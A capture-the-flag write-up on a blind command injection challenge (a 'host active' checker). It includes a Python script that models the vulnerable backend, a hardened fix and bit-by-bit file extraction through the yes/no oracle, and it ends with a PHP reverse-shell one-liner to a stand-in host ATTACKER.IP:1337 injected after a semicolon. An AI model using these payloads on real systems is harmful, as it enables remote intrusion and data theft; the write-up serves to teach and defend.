Learn some CTF tips and tricks! Presented by the WGCS Club at KLSGIT
In my college-level project I created this website that tells us if any domain/ip is active or not. But there is a catch.
The intended way to solve this challenge is a blind command injection.
This is how the website functions
Now let's try to play with it
FISHY!
This is the sign of a blind command injection: entering localhosts on its own reports the host as not active, but appending ;ls makes the site report it as active. The input is evidently being handed to a shell, and the "active" verdict comes from the exit status of whatever command runs last: the probe of a bogus host fails, but ls succeeds. We never see any command output, only this yes/no answer, which is what makes it blind.
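What we have at this point is an exit-status oracle, and it can be exploited even without a shell coming back. The Python below is an added example, not the challenge's PHP and not code from the writeup: it models an assumed backend that concatenates the host into a shell command line and reports "active" when that line exits 0, shows the hardened version next to it (allow-list the host, pass it as a single argv entry, no shell), and then reads a constructed flag.txt through the yes/no oracle alone, eight requests per character, which is the route you would need if the box could not reach your listener. The names vulnerable_is_active, hardened_is_active, extract_file_blind, the probe_cmd parameter and the use of false as a stand-in for a failed probe of a bogus host are all my assumptions.

```python
import os
import re
import shlex
import subprocess
import tempfile
from typing import Callable

# The only thing an "is this host active?" checker should accept: a DNS name
# or IPv4 address made of letters, digits, dots and hyphens, never starting
# with '-' so the value can never be parsed as an option by the probe command.
_HOST_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252})$")


def is_valid_host(host: str) -> bool:
    """Allow-list check used by the hardened checker."""
    return bool(_HOST_RE.match(host))


def vulnerable_is_active(host: str, probe_cmd: str = "ping -c 1 -W 1") -> bool:
    """Assumed model of the challenge backend (its PHP source was not shown).

    The user-supplied host is concatenated into a shell command line and the
    site answers "active" when that command line exits 0. Because the string
    goes through /bin/sh, a ';' ends the probe and starts a second command
    whose exit status becomes the verdict: the oracle seen with ';ls'.
    probe_cmd is a parameter only so the oracle can be exercised offline.
    """
    cmd = f"{probe_cmd} {host}"  # string concatenation into a shell line: the bug
    result = subprocess.run(cmd, shell=True,
                            stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return result.returncode == 0


def hardened_is_active(host: str, probe_cmd: str = "ping -c 1 -W 1") -> bool:
    """Same feature without the injection: validate, then pass host as one argv."""
    if not is_valid_host(host):
        raise ValueError(f"rejected host value: {host!r}")
    argv = shlex.split(probe_cmd) + [host]  # no shell involved, nothing re-parsed
    result = subprocess.run(argv, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return result.returncode == 0


def extract_file_blind(oracle: Callable[[str], bool], path: str, max_len: int = 128) -> str:
    """Read a one-line ASCII file through a yes/no oracle, 8 requests per byte.

    Every payload keeps the harmless 'localhosts' probe in front and appends a
    test command whose exit status leaks one fact. The byte value of each
    character is found by binary search over 0..127, using POSIX printf's
    "'c" conversion (printf %d "'V" prints 86).
    """
    qpath = shlex.quote(path)
    recovered = ""
    for pos in range(1, max_len + 1):
        # cut -c N prints the N-th character of the line (empty past the end),
        # so an empty result is the end-of-data condition.
        if not oracle(f'localhosts; [ -n "$(cut -c {pos} {qpath})" ]'):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            payload = (f'localhosts; c=$(cut -c {pos} {qpath}); '
                       f'[ "$(printf %d "\'$c")" -gt {mid} ]')
            if oracle(payload):   # exit 0 means the byte value is above mid
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


def demo_blind_extraction() -> str:
    """Constructed end-to-end run: write a sample flag file, recover it blind.

    probe_cmd="false" stands in for a probe of a host that does not exist
    (it fails just as a ping of 'localhosts' would), keeping the demo offline.
    """
    with tempfile.TemporaryDirectory() as d:
        flag_path = os.path.join(d, "flag.txt")
        with open(flag_path, "w") as f:
            f.write("VishwaCTF{b1inD_cmd-i}\n")  # constructed sample flag file
        oracle = lambda host_input: vulnerable_is_active(host_input, probe_cmd="false")
        return extract_file_blind(oracle, flag_path)


if __name__ == "__main__":
    print("localhosts     ->", vulnerable_is_active("localhosts", probe_cmd="false"))
    print("localhosts; ls ->", vulnerable_is_active("localhosts; ls", probe_cmd="false"))
    print("recovered flag ->", demo_blind_extraction())
```

The hardened checker fixes the bug at the right layer: the shell is never involved, so ; & | $( ) have no meaning, and the allow-list additionally stops a value such as -f from being read as an option by the probe. Validation alone (blocking ;) is not enough, since newlines, backticks and $( ) reach the same shell.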
Inspecting the response I intercepted in Burp Suite, I found this header: X-Powered-By: PHP/8.1.2-1ubuntu2.11
This tells us two things. 1- The OS is Ubuntu (1ubuntu2.11 is the Ubuntu package revision). 2- The website's backend is PHP, so the php binary is on the box and can be used for the callback. So I went to revshells.com and grabbed this PHP reverse shell payload:
php -r '$sock=fsockopen("ATTACKER.IP",1337);shell_exec("sh <&3 >&3 2>&3");'
A nc listener on port 1337 is running, exposed through ngrok (ATTACKER.IP and the port must be replaced with the public host and port ngrok hands out). The payload assumes the new socket becomes file descriptor 3 in the php process, which holds when only stdin, stdout and stderr are open, as is the case for the revshells one-liner. The final payload I sent to the web application is this:
localhosts;php -r '$sock=fsockopen("ATTACKER.IP",1337);shell_exec("sh <&3 >&3 2>&3");'
Once the shell connects back, print the flag with cat, or skip the shell altogether: the flag sits in the web root, so adding /flag.txt to the site's URL serves it directly.
VishwaCTF{b1inD_cmd-i}